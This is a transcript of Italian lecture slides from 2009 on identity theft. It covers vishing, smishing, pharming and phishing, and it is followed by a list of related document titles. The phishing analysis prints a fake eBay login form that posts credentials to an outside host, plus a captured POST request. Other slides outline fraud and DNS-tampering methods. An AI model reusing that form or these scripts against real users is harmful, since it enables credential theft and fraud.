Identity management Access nel web 2.0 Associazione Aica, Genova, 15 Settembre 2009

Dimensione: px
Iniziare la visualizzazioe della pagina:

Download "Identity management Access nel web 2.0 Associazione Aica, Genova, 15 Settembre 2009"

Transcript

1 Identity management Access nel web 2.0 Associazione Aica, Genova, 15 Settembre 2009 Maurizio Aiello Consiglio Nazionale delle Ricerche Istituto di Elettronica ed Ingegneria dell'informazione e delle Telecomunicazioni

2 Furto di identità Social Engineering Phishing Vishing (Voice Phishing) Smishing (Sms phishing) Pharming (Attacchi DNS)

3 Social Engineering Studio del comportamento individuale al fine di carpire informazioni Migliore tecnica di crittanalisi attuale Footprinting, studio dello stile vocale, oppressione psicologica, tecnica della riconoscenza, richiesta di aiuto, boxing, etc. Kevin Mitnick, The Art of Deception

4 Vishing Voice Phishing Basato su Voice messaging IP per praticare attacchi di social engineering volti al furto di dati (personali, finanziari, confidenziali) Perchè IP? Linee fisse sono controllabili meglio (individuazione del chiamante), inoltre in questo modo posso fare chiamate da tutto il mondo gratis.

5 Vishing: motivi del successo 1) maggior fiducia sul vettore telefono piuttosto che sulla mail 2) Maggior diffusione del telefono piuttosto che della mail (soprattutto anziani); 3) Accettazione generalizzata dei sistemi a risponditore automatico. 4) Modalità di comunicazione sincrona (rapidità d'azione) 5) Maggior personalizzazione del messaggio che costituisce l'attacco 6) Call-center <-> co.co.pro. <-> accento straniero

6 Vishing: informazioni carpite Informazioni richieste:compleanno, dettagli carta di credito e bancomat (expiration date, security codes, pin), documenti (passaporto, National Ids). 1) Accesso ai conti bancari Utilizzi dell'attacco: 2) Acquisto beni su Internet e nel mondo reale 3) Trasferimento denaro e riciclaggio (vedi prossima slide) Falsificazione documenti (ad un controllo telematico tutto è ok).

7 Scenario: riciclaggio Ad Alice (Italia) vengono rubate le credenziali di accesso al conto Bob viene convinto tramite vishing ad effettuare transazioni Italia Estero trattenendosi il 10% Eve riceve da Bob il 90% dei soldi rubati ad Alice. Vantaggi: Italia Italia non ci sono controlli da parte della banca Le indagini si concentrano su Bob inizialmente (guadagno di tempo).

8 Vishing: technological benefit Telefoni raggiunti da ogni parte del mondo (e.g. Skype?) Costi minimi Mascheramento o impersonificazione del caller-id War dialing (automatizzazione), con creazione software di call-center fake. Difficoltà a effettuare il filtraggio (come invece avviene per il phishing) Proxy per il routing internazionale dei messaggi

9 Vishing: technoogical benefits Malware per diffusione e scalabilità del message delivery Riconoscimento dei toni per acquisire numeri Riconoscimento vocale automatizzato per acquisire altri dati personali

10 Vishing: esempio tramite Attacco simile al phishing, al posto dell'url c'è un numero di telefono da chiamare (Nazionale! Vedi skype) Caro cliente,... Banca XXX per proteggere i tuoi soldi ha bloccato il conto. Chiama lo 02/ per verificare i tuoi dati. Si esegue la chiamata, 4 o più scelte: 1 per movimenti e saldo conto 2 per effettuare transazioni 3 per sbloccare un conto bloccato 0 per parlare con un operatore

11 Vishing: Dobbiamo verificare... e in rapida successione: Numero di conto Data e luogo di nascita Numero di carta d'identità Pin e codici vari per l'accesso via Internet Alla fine viene effettuato il trasferimento verso operatore: Vero, rerouting verso call center reale Fake, cade la linea

12 Skype:numero regionale

13 Vishing: esempio voic Spingono a effettuare risposte immediate basate su bisogni effettivi: Come da lei richiesto domani sarà chiusa l'erogazione di corrente elettrica presso la sua abitazione. Per il saldo finale, le informazioni relative e per parlare con un operatore chiami il 02/ Varianti e add-ons: Si chiama un numero a pagamento (899...) Si mettono in piedi veri call-center alternativi ai risponditori automatici

14 Vishing: varianti Interviste a pagamento, al termine si chiedono tutti i dettagli (e qualcosa in più :-) del conto corrente per l'accredito Dumpster boxing: individuato il soggetto si cerca nel suo trash (es. le ricevute dei prelievi bancomat) e si eseguono attacchi personalizzati basati su conoscenza di fatti riservati (es. num. Bancomat o carta di credito)

15 Vishing:tracciabilità Chiamate uscenti: Fake caller-id Chiamate voip da internet, stessa difficoltà che tracciare un pc che commette abusi Chiamate entranti verso un call-center fake: Linea telefonica registrata con documenti falsi Linea voip (es. Skype): riesco a trovare gli estremi della carta di credito del criminale e basta User skype rubato, addebiti pagati con carte rubate.

16 Vishing: mms e sms E' stata richiesta l'apertura di un nuovo fido su Banca XXX; in caso questa richiesta non sia autorizzata da lei contattare 02/ Da proprio provider telefonico: hai superato il limite di traffico gratuito del mese: rispondi con il tuo codice della carta di credito per avere ulteriore traffico a 3euro. Scarica loghi, suonerie, gratuitamente!!!

17 Smishing: SMS Phishing Invio di sms fake tramite software ad-hoc che consente la manipolazione del mittente: software firesms siti smsforge.net, (da verificare) Attenzione, chiami il numero xxxxxxx di Servizi Interbancari per verificare la transazione della sua carta di credito al fine di evitarne usi fraudolenti Richiesta codici (voce preregistrata) e successiva attesa operatore non disponibile.

18 Smishing: converging technologies Lo hook (entità che cattura le informazioni) può essere sia un sito web (phishing) che un call-center (vishing) Si possono usare sia i telefoni sms che i gateway web per inviare i messaggi sms fake Si sono visti troiani (eliles.a) che si installano sul pc, si propagano come worm, tramite sms gateway fanno smishing con il target di inserire un troiano dentro Nokia N60.

19 Smishing: SMS Phising Motivi del successo: accettazione del cellulare come mezzo più riservato della posta elettronica (falso, war dialing, elenchi su web, vendita usato etc.) Accettazione della chiamata da/verso call center più facilmente che non contatto tramite web Truffa ai danni di Carta Sì, usando come mittente TIM o VISA.

20 Pharming Dopo attacco (spoofed server) Il server spoofed si presenta identico in tutte le sue forme a quello originale!! (normale phishing)

21 Pharming: motivi successo Di solito si controllano i link: https://www.posteitaliane.ru No possibilità di controllo (dovrei interrogare DNS autonomi) Siti clonati perfettamente (ad es. acquistando un conto vero e facendo prove).

22 Pharming: info rubate Normale transazione: user, password, pincode vari richiesti durante la transazione Dati aggiuntivi richiesti ad-hoc: anagrafica, altri conti, assicurazioni, familiari etc.

23 Pharming: tecnologia Intrusione e modifica del Dns del provider della banca o via social engineering o tramite attacco diretto Dns cache poisoning sul provider della vittima Inserimento di troiano nel pc vittima e modifica del file c:\windows\system32\drivers\etc Inserimento di troiano nel pc vittima e modifica del registro con cambiamenti dei dns predefiniti.

24 Pharming: difese Buon antivirus Personal Firewall con controllo di accesso siti (quasi infattibile nella realtà Controllo dei certificati digitali offerti dai server (quasi certamente non eseguito)

25 Pharming: varianti e to-do Man in the middle attacks: le informazioni vengono carpite, usate per autenticarsi sul server vero e di conseguenza mostrate all'utente, aumentando la confidenza e la sensazione di sicurezza dello stesso.

26 Phishing Attacco proveniente da Solite tecniche di social engineering (il conto verrà chiuso, ci sono degli addebiti anomali, controllo delle credenziali etc.)

27 Phishing: tecnologia SMTP sender address spoofing Riproduzione fedele dei loghi e indirizzi di posta nella mail Riproduzione fedele del layout del sito (e.g. Usando ffline browsers) Offuscamento dei link (banale, oppure utilizzando indirizzi ip al posto dei link, o indirizzi ip in notazione tutta numerica

28 Phishing: esempio pratico

29 Phihing: analisi header Received: from nameserver.ge.cnr.it (nameserver.ge.cnr.it [ ]) by gentoo2.ieiit.cnr.it (Postfix) with ESMTP id 002C41FB6AD for Wed, 2 Jan :15: (CET) X-Greylist: delayed 548 seconds by postgrey-1.16 at nameserver.ge.cnr.it; Wed, 02 Jan :30:19 CET Received: from mail.ispotclothing.com (unknown [ ]) by nameserver.ge.cnr.it (Postfix) with ESMTP id 859CB1827B for Wed, 2 Jan :30: (CET) Received: from User by mail.ispotclothing.com with SMTP (Code-Crafters Ability Mail Server 2.55); Wed, 02 Jan :21: Reply-To: it.ge.cnr.it> From: "Utente di ebay: goldenmovie" Subject: Hai ricevuto una domanda sull'oggetto Date: Wed, 2 Jan :21:

30 Phishing: esempio pratico Contenuto di zmail.ru:

31 Phishing: analisi codice <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/tr/html4/loose.dtd"><html> <meta http-equiv="content-type" content="text/html; charset=iso "><!--srcid: SignIn--> <title>benvenuto su ebay</title><script language="javascript"><!-- var pagename = "PageSignIn"; //--></script><script language="javascript"><!--... href="https://secureinclude.ebaystatic.com/css/e543/it/areatitledeployme nt_ssl_e5431it.css" media="all" rel="stylesheet"> </head> <body bgcolor="#ffffff" onload="doframesbuster();">......

32 Phishing: analisi codice <form method="post" name="signinform" onsubmit="setoptimcookie();" style="margin:0px" action=http://www2.fiberbit.net/form/mailto.cgi method=post enctype=x-www-form-urlencoded> <INPUT type=hidden value=yahoo name=mail_from> <INPUT type=hidden name=mail_to> <INPUT type=hidden value=ita name=mail_subject> <INPUT type=hidden value=http://www.ebay.it/name=next_page> <INPUT type=hidden value=0 name=smauthreason> <INPUT type=hidden value=http://olgutza.nm.ru/bpol/cartepre/grazie.txt name=target>... ID utente <td><input type="text" name="userid" maxlength="64" tabindex="1" value="" size="27"></td> <a name="password" style="text-decoration:none">password </a></td> <td><input type="password" name="pass" maxlength="64" value="" tabindex="2" size="27"></td>

33 Phishing: analisi diretta Basta perder tempo! Address A Address B Packets Bytes Packets A->B Bytes A->B Packets A<-B Bytes A<-B Risoluzione Tipo local_pc pages.ebay.it inversa local_pc www2.kjps.net inversa poi con la diretta scopro local_pc www2.fiberbit.net local_pc local_pc local_pc Akamai whois, inversa local_pc local_pc local_pc

34 Analisi pcap POST /form/mailto.cgi HTTP/1.1 Host: www2.fiberbit.net User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv: ) Gecko/ Firefox/ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: it-it,it;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip,deflate Accept-Charset: ISO ,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 228 Mail_From=Yahoo&Mail_To=cicciobello570%40hotmail.it&Mail_Subject=ITA&Next_Page=http%3A%2F%2Fwww.ebay.it %2F&SMAUTHREASON=0&TARGET=http%3A%2F%2Folgutza.nm.ru%2Fbpol%2Fcartepre%2Fgrazie.txt&userid=ci cciociccio&pass=ciaobello HTTP/ Found Date: Wed, 02 Jan :28:55 GMT Server: Apache/ (Unix) Location: Keep-Alive: timeout=2, max=19 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso

Network Troubleshooting 101

Network Troubleshooting 101 ICT Security n. 16, Ottobre 2003 p. 1 di 5 Network Troubleshooting 101 Il titolo prettamente americano vuole rispondere al momento di panico capitato a tutti quando qualche cosa non funziona più: si è

Dettagli

Sicurezza delle applicazioni web: protocollo HTTP

Sicurezza delle applicazioni web: protocollo HTTP Università degli Studi di Milano Facoltà di Scienze Matematiche, Fisiche e Naturali Anno Accademico 2009/2010 Sicurezza delle applicazioni web: protocollo HTTP Roberto Paleari roberto@security.dico.unimi.it

Dettagli

Sicurezza delle applicazioni web: protocollo HTTP

Sicurezza delle applicazioni web: protocollo HTTP Università degli Studi di Milano Facoltà di Scienze Matematiche, Fisiche e Naturali Sicurezza delle applicazioni web: protocollo HTTP Alessandro Reina Aristide Fattori

Dettagli

INFORMATICA DISTRIBUITA. lez 5 World Wide Web (cont)

INFORMATICA DISTRIBUITA. lez 5 World Wide Web (cont) INFORMATICA DISTRIBUITA prof. lez 5 World Wide Web (cont) Università degli Studi di Milano Scienze e Tecnologie della Comunicazione Musicale a.a. 2009-2010 Protocolli usabili nelle URL http: ftp: : http://www.dico.unimi.it/

Dettagli

Attacchi Web - Introduzione alla sicurezza nelle applicazioni Web

Attacchi Web - Introduzione alla sicurezza nelle applicazioni Web Attacchi Web Introduzione alla sicurezza nelle applicazioni Web Davide Marrone davide@security.dico.unimi.it Università degli Studi di Milano Facoltà di Scienze Matematiche, Fisiche e Naturali Dipartimento

Dettagli

Uso di ACL per la protezione di una rete

Uso di ACL per la protezione di una rete Uso di ACL per la protezione di una rete Claudio Telmon Dipertimento di Informatica Università di Pisa Claudio Telmon - ACL per la protezione-1 Raccolta di informazioni Raccolta

Dettagli

Assignment (1) - Varie

Assignment (1) - Varie Elementi di Sicurezza e Privatezza Laboratorio 6 - Vulnerabilità di applicazioni Web (1) Chiara Braghin chiara.braghin@unimi.it! Assignment (1) - Varie Al link http://www.dti.unimi.it/braghin/ elementi/lab/lista_consegnati.pdf

Dettagli

Elementi di Sicurezza e Privatezza Laboratorio 6 - Vulnerabilità di applicazioni Web (1) Chiara Braghin chiara.braghin@unimi.it!

Elementi di Sicurezza e Privatezza Laboratorio 6 - Vulnerabilità di applicazioni Web (1) Chiara Braghin chiara.braghin@unimi.it! Elementi di Sicurezza e Privatezza Laboratorio 6 - Vulnerabilità di applicazioni Web (1) Chiara Braghin chiara.braghin@unimi.it! Assignment (1) - Varie Al link http://www.dti.unimi.it/braghin/ elementi/lab/lista_consegnati.pdf

Dettagli

Architetture Applicative Il Web

Architetture Applicative Il Web Architetture Applicative Il Web Alessandro Martinelli alessandro.martinelli@unipv.it 18 Marzo 2014 Architetture Architetture Web L Architettura Client-Server HTTP Protocolli di Comunicazione Fondamenti

Dettagli

GUIDA ALLA SICUREZZA IL PHISHING - TENTATIVI DI FRODE VIA E-MAIL. Come proteggersi dal PHISHING - Decalogo ABI Lab per i clienti

GUIDA ALLA SICUREZZA IL PHISHING - TENTATIVI DI FRODE VIA E-MAIL. Come proteggersi dal PHISHING - Decalogo ABI Lab per i clienti GUIDA ALLA SICUREZZA IL PHISHING - TENTATIVI DI FRODE VIA E-MAIL Il phishing consiste nella creazione e nell uso di e-mail e siti web ideati per apparire come e-mail e siti web istituzionali di organizzazioni

Dettagli

Web e HTTP. path name. host name Realizzato da Roberto Savino. www.someschool.edu/somedept/pic.gif

Web e HTTP. path name. host name Realizzato da Roberto Savino. www.someschool.edu/somedept/pic.gif Web e HTTP Terminologia Una pagina web consiste di oggetti Un oggetto può essere un file HTML, una immagine JPG, ecc. Una pagina web consiste di un file HTML base che fa riferimento a diversi oggetti al

Dettagli

Infrastrutture e Protocolli per Internet Laboratorio 1

Infrastrutture e Protocolli per Internet Laboratorio 1 Advanced Network Technologies Laboratory Infrastrutture e Protocolli per Internet Laboratorio 1 Stefano Napoli Alberto Pollastro Politecnico di Milano Laboratori Responsabili di Laboratorio: Stefano Napoli

Dettagli

Architetture Web Protocolli di Comunicazione

Architetture Web Protocolli di Comunicazione Architetture Web Protocolli di Comunicazione Alessandro Martinelli alessandro.martinelli@unipv.it 10 Maggio 2011 Architetture Web Architetture Web Protocolli di Comunicazione Il Client Side Il Server Side

Dettagli

Introduzione alla. Sicurezza: difesa dai malintenzionati. Proprietà Attacchi Contromisure. Prof. Filippo Lanubile. Prof.

Introduzione alla. Sicurezza: difesa dai malintenzionati. Proprietà Attacchi Contromisure. Prof. Filippo Lanubile. Prof. Introduzione alla sicurezza di rete Proprietà Attacchi Contromisure Sicurezza: difesa dai malintenzionati Scenario tipico della sicurezza di rete: man in the middle Proprietà fondamentali della sicurezza

Dettagli

Pagamenti elettronici

Pagamenti elettronici Pagamenti elettronici Guida alla sicurezza Obiettivo di questa guida è informarti sugli strumenti che la Cassa Rurale BCC di Treviglio ti mette a disposizione per gestire con ancor più sicurezza le operazioni

Dettagli

Ministero dell Interno Compartimento Polizia Postale e delle Comunicazioni per la Lombardia MILANO

Ministero dell Interno Compartimento Polizia Postale e delle Comunicazioni per la Lombardia MILANO Ministero dell Interno Compartimento Polizia Postale e delle Comunicazioni per la Lombardia MILANO phishing and identity-related frauds Milano, 26 novembre 2008 Tutela dell informazione e crimini informatici

Dettagli

Il protocollo HTTP e HTTPS

Il protocollo HTTP e HTTPS Il protocollo HTTP e HTTPS Guida Apache di Openskills Introduzione al protocollo HTTP Il protocollo HTTP (Hyper Text Transfer Protocol) viene usato da tutti i client e server web e gestisce il modo con

Dettagli

GLI ILLECITI COMMESSI ATTRAVERSO IL WEB FINALIZZATI AL FURTO D IDENTITA

GLI ILLECITI COMMESSI ATTRAVERSO IL WEB FINALIZZATI AL FURTO D IDENTITA GLI ILLECITI COMMESSI ATTRAVERSO IL WEB FINALIZZATI AL FURTO D IDENTITA Torino, 10 dicembre 2013 LA POLIZIA POSTALE E DELLE COMUNICAZIONI 20 COMPARTIMENTI 80 SEZIONI 2000 OPERATORI Contrasto Reati Informatici

Dettagli

Guida alla sicurezza, in banca PER GESTIRE AL MEGLIO I PAGAMENTI ELETTRONICI

Guida alla sicurezza, in banca PER GESTIRE AL MEGLIO I PAGAMENTI ELETTRONICI Guida alla sicurezza, in banca PER GESTIRE AL MEGLIO I PAGAMENTI ELETTRONICI Indice 2 Approfondamenti 3 Caro Lettore, PattiChiari è il Consorzio attraverso il quale l industria bancaria italiana lavora

Dettagli

Attacchi - panoramica

Attacchi - panoramica Attacchi - panoramica Metodi e strumenti per la Sicurezza informatica Claudio Telmon claudio@telmon.org Tecniche di attacco Più passaggi prima del destinatario (stepstones) Accesso da sistemi poco controllati

Dettagli

Guida alla sicurezza, in banca PER GESTIRE AL MEGLIO I PAGAMENTI ELETTRONICI

Guida alla sicurezza, in banca PER GESTIRE AL MEGLIO I PAGAMENTI ELETTRONICI Guida alla sicurezza, in banca PER GESTIRE AL MEGLIO I PAGAMENTI ELETTRONICI Caro Lettore, PattiChiari è il Consorzio attraverso il quale l industria bancaria italiana lavora per semplificare l uso dei

Dettagli

e quindi di navigare in rete. line può essere limitato a due persone o coinvolgere un ampio numero

e quindi di navigare in rete. line può essere limitato a due persone o coinvolgere un ampio numero Glossario Account (profilo o identità) insieme dei dati personali e dei contenuti caricati su un sito Internet o su un social network. Anti-spyware programma realizzato per prevenire e rilevare i programmi

Dettagli

Infrastrutture e Protocolli per Internet Laboratorio 1

Infrastrutture e Protocolli per Internet Laboratorio 1 Advanced Network Technologies Laboratory Infrastrutture e Protocolli per Internet Laboratorio 1 Stefano Napoli Alberto Pollastro Politecnico di Milano Laboratori Responsabili di Laboratorio: Stefano Napoli

Dettagli

Sicurezza: credenziali, protocolli sicuri, virus, backup

Sicurezza: credenziali, protocolli sicuri, virus, backup Sicurezza: credenziali, protocolli sicuri, virus, backup La sicurezza informatica Il tema della sicurezza informatica riguarda tutte le componenti del sistema informatico: l hardware, il software, i dati,

Dettagli

Attacchi login: Spoofing, Sniffing, Phishing, Keyloggers

Attacchi login: Spoofing, Sniffing, Phishing, Keyloggers Attacchi login: Spoofing, Sniffing, Phishing, Keyloggers Patrick Assirelli Matteo Battaglia Gruppo 9 Corso di Sicurezza A.A. 2008/09 Introduzione Esistono diversi tipi di minacce e attacchi a cui una rete

Dettagli

Convegno Nazionale di Information Systems Auditing

Convegno Nazionale di Information Systems Auditing Convegno Nazionale di Information Systems Auditing Strategie di difesa dalle frodi: IT Governance e metodologie Verona, 25 Maggio 2006 Massimo Chiusi UniCredit S.p.A. Divisione Global Banking Services

Dettagli

Provider e Mail server

Provider e Mail server Il servizio di elettronica Provider e Mail server Il servizio di elettronica o e-mail nasce per scambiarsi messaggi di puro testo o altri tipi di informazioni (file di immagini, video, ecc.) fra utenti

Dettagli

Telematica II 13. Posta Elettronica

Telematica II 13. Posta Elettronica Posta Elettronica #1 la Posta Elettronica e basata su due componenti: s : applicativi utilizzati dall utente per comporre, inviare e leggere messaggi (p.e. Outlook) Telematica II 13. Posta Elettronica

Dettagli

Servizi di rete e web. Prof. Maurizio Naldi A.A. 2015/16

Servizi di rete e web. Prof. Maurizio Naldi A.A. 2015/16 Servizi di rete e web Prof. Maurizio Naldi A.A. 2015/16 Applicazione Unità di trasmissione dati a livello applicazione Applicazione Presentazione Unità di trasmissione dati a livello presentazione Presentazione

Dettagli

Elementi di Sicurezza e Privatezza Lezione 16 Web Security - Code Injection (2)

Elementi di Sicurezza e Privatezza Lezione 16 Web Security - Code Injection (2) Elementi di Sicurezza e Privatezza Lezione 16 Web Security - Code Injection (2) Chiara Braghin chiara.braghin@unimi.it XSS Cross Site Scripting Cosa è XSS? (1) Forma di attacco in cui l attaccante è in

Dettagli

Navigare in sicurezza

Navigare in sicurezza Navigare in sicurezza Recentemente sono state inviate email apparentemente di BNL (negli esempi riportati compare come mittente "BNL Banca"), che invitano a fornire le credenziali di accesso all'area clienti

Dettagli

GATEWAY SMS KYRON.IT Documentazione tecnica Versione 1.0 del 21/9/2004

GATEWAY SMS KYRON.IT Documentazione tecnica Versione 1.0 del 21/9/2004 GATEWAY SMS KYRON.IT Documentazione tecnica Versione 1.0 del 21/9/2004 1. INTRODUZIONE Gli utenti autorizzati all utilizzo dei servizi SMS Kyron possono inviare messaggi SMS da applicazioni custom che

Dettagli

Lucidi a cura di Andrea Colombari, Carlo Drioli e Barbara Oliboni. Lezione 4

Lucidi a cura di Andrea Colombari, Carlo Drioli e Barbara Oliboni. Lezione 4 Lucidi a cura di Andrea Colombari, Carlo Drioli e Barbara Oliboni Lezione 4 Introduzione alle reti Materiale tratto dai lucidi ufficiali a corredo del testo: D. Sciuto, G. Buonanno e L. Mari Introduzione

Dettagli

IL LIVELLO APPLICAZIONI DNS, SNMP e SMTP

IL LIVELLO APPLICAZIONI DNS, SNMP e SMTP Parte II - Reti di Calcolatori IL LIVELLO APPLICAZIONI DNS, SNMP e SMTP 6-1 Applicazioni di Rete Domain Name System (DNS) Simple Network Manag. Protocol (SNMP) Posta elettronica Multipurpose Internet Mail

Dettagli

Politecnico di Milano Re# di Comunicazione e Internet

Politecnico di Milano Re# di Comunicazione e Internet Politecnico di Milano Re# di Comunicazione e Internet Wireshark e Protocolli Applica1vi Agenda della lezione Wireshark Protocolli applica1vi: Simple Mail Transfer Protocol (SMTP) Post Office Protocol (POP)

Dettagli

SICUREZZA INFORMATICA MINACCE

SICUREZZA INFORMATICA MINACCE SICUREZZA INFORMATICA MINACCE Come evitare gli attacchi di phishing e Social Engineering Ver.1.0, 19 febbraio 2015 2 Pagina lasciata intenzionalmente bianca 1. CHE COSA È UN ATTACCO DI SOCIAL ENGINEERING?

Dettagli

Sicurezza delle operazioni

Sicurezza delle operazioni Sicurezza delle operazioni GUIDA PRATICA PER LA CLIENTELA www.pattichiari.it 2 Caro Lettore, PattiChiari è il Consorzio di banche nato per semplificare l uso dei prodotti bancari e per migliorare le conoscenze

Dettagli

url uniform resource locator

url uniform resource locator url uniform resource locator m. patrignani nota di copyright questo insieme di slides è protetto dalle leggi sul copyright il titolo ed il copyright relativi alle slides (inclusi, ma non limitatamente,

Dettagli

IL LIVELLO APPLICAZIONI DNS, SNMP e SMTP

IL LIVELLO APPLICAZIONI DNS, SNMP e SMTP Reti di Calcolatori IL LIVELLO APPLICAZIONI DNS, SNMP e SMTP D. Talia RETI DI CALCOLATORI - UNICAL 6-1 Applicazioni di Rete Domain Name System (DNS) Simple Network Manag. Protocol (SNMP) Posta elettronica

Dettagli

Reti di Calcolatori. IL LIVELLO APPLICAZIONI DNS, SNMP e SMTP

Reti di Calcolatori. IL LIVELLO APPLICAZIONI DNS, SNMP e SMTP Reti di Calcolatori IL LIVELLO APPLICAZIONI DNS, SNMP e SMTP D. Talia RETI DI CALCOLATORI - UNICAL 6-1 Applicazioni di Rete Domain Name System (DNS) Simple Network Manag. Protocol (SNMP) Posta elettronica

Dettagli

TECN.PROG.SIST.INF. Livello APPLICAZIONE - TELNET. Roberta Gerboni

TECN.PROG.SIST.INF. Livello APPLICAZIONE - TELNET. Roberta Gerboni Roberta Gerboni Protocollo TELNET Telnet è costituito da un insieme di componenti che consentono di trasformare un computer in un terminale remoto di un altro computer. Una sessione Telnet richiede: un

Dettagli

Conservazione dei dati originali. Conformità dei dati acquisiti a quelli originali

Conservazione dei dati originali. Conformità dei dati acquisiti a quelli originali Conservazione dei dati originali Inalterabilità dei dati originali Conformità dei dati acquisiti a quelli originali Pag. 1 Sequestro di hardware: SEQUESTRO DELL INFORMAZIONE DIGITALE - Intera macchina

Dettagli

Protocolli per il Web. Impianti Informatici. Protocolli applicativi

Protocolli per il Web. Impianti Informatici. Protocolli applicativi Protocolli per il Web Protocolli applicativi I protocolli applicativi 2 Applicazioni Socket interface HTTP (WEB) SMTP (E-MAIL) FTP... NFS RPC DNS... Trasporto TCP UDP Rete ICMP RIP OSPF IP ARP RARP Non

Dettagli

M ODULO 7 - SYLLABUS 1.0. IT Security. Corso NUOVA ECDL 2015 prof. A. Costa

M ODULO 7 - SYLLABUS 1.0. IT Security. Corso NUOVA ECDL 2015 prof. A. Costa M ODULO 7 - SYLLABUS 1.0 IT Security Corso NUOVA ECDL 2015 prof. A. Costa Minacce ai dati 1 Concetti di sicurezza Differenze fra dati e informazioni Il termine crimine informatico: intercettazione, interferenza,

Dettagli

Elementi di Informatica e Programmazione

Elementi di Informatica e Programmazione Elementi di Informatica e Programmazione La Rete Internet Corsi di Laurea in: Ingegneria Civile Ingegneria per l Ambiente e il Territorio Università degli Studi di Brescia Che cos è Internet? Il punto

Dettagli

Sistemi Di Elaborazione Dell informazione

Sistemi Di Elaborazione Dell informazione Sistemi Di Elaborazione Dell informazione Dott. Antonio Calanducci Lezione IV: Internet e la posta elettronica Corso di Laurea in Scienze della Comunicazione Anno accademico 2009/2010 Outline - Internet

Dettagli

UNA PIATTAFORMA SICURA PER I PAGAMENTI ONLINE

UNA PIATTAFORMA SICURA PER I PAGAMENTI ONLINE UNA PIATTAFORMA SICURA PER I PAGAMENTI ONLINE Marco Gallone Sella Holding Banca 28 Novembre 2006 Il Gruppo Banca Sella ed il Commercio Elettronico Dal 1996 Principal Member dei circuiti Visa e MasterCard

Dettagli

SICUREZZA IN RETE. Versione leggera. A cura di: M. Ivan Fabris. Progetto grafico e struttura: Ing. Michele Mordenti. Release : Forlì, 2008 10 04

SICUREZZA IN RETE. Versione leggera. A cura di: M. Ivan Fabris. Progetto grafico e struttura: Ing. Michele Mordenti. Release : Forlì, 2008 10 04 SICUREZZA IN RETE Versione leggera A cura di: M. Ivan Fabris Progetto grafico e struttura: Ing. Michele Mordenti Release : Forlì, 2008 10 04 SOMMARIO Jungla Selvaggia Attacchi illeggittimi e legittimi

Dettagli

Claudio Allocchio. SPAM? No Grazie! Claudio Allocchio. Spam? No Grazie! Firenze, 24 e 25 Gennaio 2001. III Incontro di GARR-B. III Incontro di GARR-B

Claudio Allocchio. SPAM? No Grazie! Claudio Allocchio. Spam? No Grazie! Firenze, 24 e 25 Gennaio 2001. III Incontro di GARR-B. III Incontro di GARR-B Spam? No Grazie! Firenze, 24 e 25 Gennaio 2001 Sommario Rissunto delle puntate precedenti......non c e un solo tipo di Spam! Come raccogliere le informazioni Header e logs : l impronta digitale del delitto

Dettagli

Reti di Calcolatori. Master "Bio Info" Reti e Basi di Dati Lezione 2

Reti di Calcolatori. Master Bio Info Reti e Basi di Dati Lezione 2 Reti di Calcolatori Sommario Software di rete TCP/IP Livello Applicazione Http Livello Trasporto (TCP) Livello Rete (IP, Routing, ICMP) Livello di Collegamento (Data-Link) I Protocolli di comunicazione

Dettagli

Come lavora il CERT Difesa

Come lavora il CERT Difesa COMANDO C4 DIFESA Capo Ufficio Piani e Sicurezza e Capo del CERT Difesa TC Come lavora il CERT Difesa Col. AAras Enrico RIGHETTI Roma 30 novembre 2011 SOMMARIO Il CERT Difesa Il SOC La minaccia Conclusioni

Dettagli

Connessioni sicure: ma quanto lo sono?

Connessioni sicure: ma quanto lo sono? Connessioni sicure: ma quanto lo sono? Vitaly Denisov Contenuti Cosa sono le connessioni sicure?...2 Diversi tipi di protezione contro i pericoli del network.....4 Il pericolo delle connessioni sicure

Dettagli

Elementi di Informatica e Programmazione

Elementi di Informatica e Programmazione Elementi di Informatica e Programmazione La Rete Internet Corsi di Laurea in: Ingegneria Civile Ingegneria per l Ambiente e il Territorio Università degli Studi di Brescia Che cos è Internet? Il punto

Dettagli

CENTRALE DI ALLARME PER ATTACCHI INFORMATICI (Pos. 2603/3015)

CENTRALE DI ALLARME PER ATTACCHI INFORMATICI (Pos. 2603/3015) serie Tecnica n. Codice Attività: TS 3015 CENTRALE DI ALLARME PER ATTACCHI INFORMATICI (Pos. 2603/3015) Scheda di segnalazione sul Phishing Si fa riferimento alla lettera circolare ABI TS/004496 del 12/09/03

Dettagli

Virus e minacce informatiche

Virus e minacce informatiche Virus e minacce informatiche Introduzione L utilizzo quotidiano della rete Internet è ormai molto intenso e spesso irrinunciabile e riguarda milioni di utenti. La sempre maggiore diffusione della posta

Dettagli

- SICUREZZA - COME UTILIZZARE AL MEGLIO IL TUO INBANK

- SICUREZZA - COME UTILIZZARE AL MEGLIO IL TUO INBANK - SICUREZZA - COME UTILIZZARE AL MEGLIO IL TUO INBANK La sicurezza del servizio InBank è garantita dall'utilizzo di tecniche certificate da enti internazionali per una comunicazione in Internet protetta.

Dettagli

McDonald's Wi-Fi Login System by BT Italia S.p.A. Multiple Vulnerabilities Report

McDonald's Wi-Fi Login System by BT Italia S.p.A. Multiple Vulnerabilities Report McDonald's Wi-Fi Login System by BT Italia S.p.A. Multiple Vulnerabilities Report Sommario Introduzione...3 Lista delle Vulnerabilità...3 Descrizione delle vulnerabilità...3 XSS...3 Captcha...4 Login...5

Dettagli

Prof. Filippo Lanubile

Prof. Filippo Lanubile Firewall e IDS Firewall Sistema che costituisce l unico punto di connessione tra una rete privata e il resto di Internet Solitamente implementato in un router Implementato anche su host (firewall personale)

Dettagli

SCENARI D'UTILIZZO DELLE NUOVE SOLUZIONI. Fabrizio Cassoni Content Security Manager fc@symbolic.it

SCENARI D'UTILIZZO DELLE NUOVE SOLUZIONI. Fabrizio Cassoni Content Security Manager fc@symbolic.it SCENARI D'UTILIZZO DELLE NUOVE SOLUZIONI Fabrizio Cassoni Content Security Manager fc@symbolic.it Agenda: Introduzione a FSAV Client Security Nuove feature Gestione tramite Policy Manager Introduzione

Dettagli

Sicurezza informatica: Nozioni di base Come proteggere il proprio computer Suggerimenti e linee guida

